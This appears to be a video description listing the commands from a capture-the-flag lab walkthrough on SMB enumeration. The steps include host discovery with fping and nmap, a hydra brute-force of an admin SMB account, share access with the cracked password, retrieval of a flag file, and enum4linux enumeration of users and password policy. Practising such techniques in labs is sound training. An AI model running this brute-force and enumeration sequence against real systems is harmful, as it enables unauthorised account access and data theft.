Project 91 - Enumerating The Details Of A Weak Password Policy w/ Enum4linux (CTF Edition)
Автор: Daryl Shows His Work
Загружено: 2025-12-01
Просмотров: 4
Commands Used (in the order that they appear in the video):
1. Ifconfig
2. fping -a -g 192.128.15.0/24
3. nmap -sV 192.128.15.3
4. hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.128.15.3 smb (brute force admin account)
5. smbmap -H 192.128.15.3 -u admin -p password1 (displays shares and permissions)
6. smbclient -L 192.128.15.3 -U admin (password1, to display Workgroup along with shares)
7. smbclient //192.128.15.3/admin -U admin (password1, to gain access to a specific SMB user's interface)
8. ? (to display the list of commands that can be ran)
9. dir (to display the subdirectories)
10. cd hidden (to switch to hidden directory)
11. dir (to display the hidden directory's contents)
12. get flag.tar.gz (to download flag to local directory)
13. exit (to end smb session)
14. ls (to see flag.tar.gz in local directory)
15. tar -xvzf flag.tar.gz (to unzip compressed file)
16. cat flag (to display flag output)
Using enum4linux
17. enum4linux -a 192.128.15.3 (enumerates all information: usernames, workgroups & their status)
18. enum4linux -a -u admin -p password1 192.128.15.3 (for credentialed use. Provides even more information)
19. Scroll all the way back up to see other user accounts displayed and password policy
Доступные форматы для скачивания:
Скачать видео mp4
-
Информация по загрузке: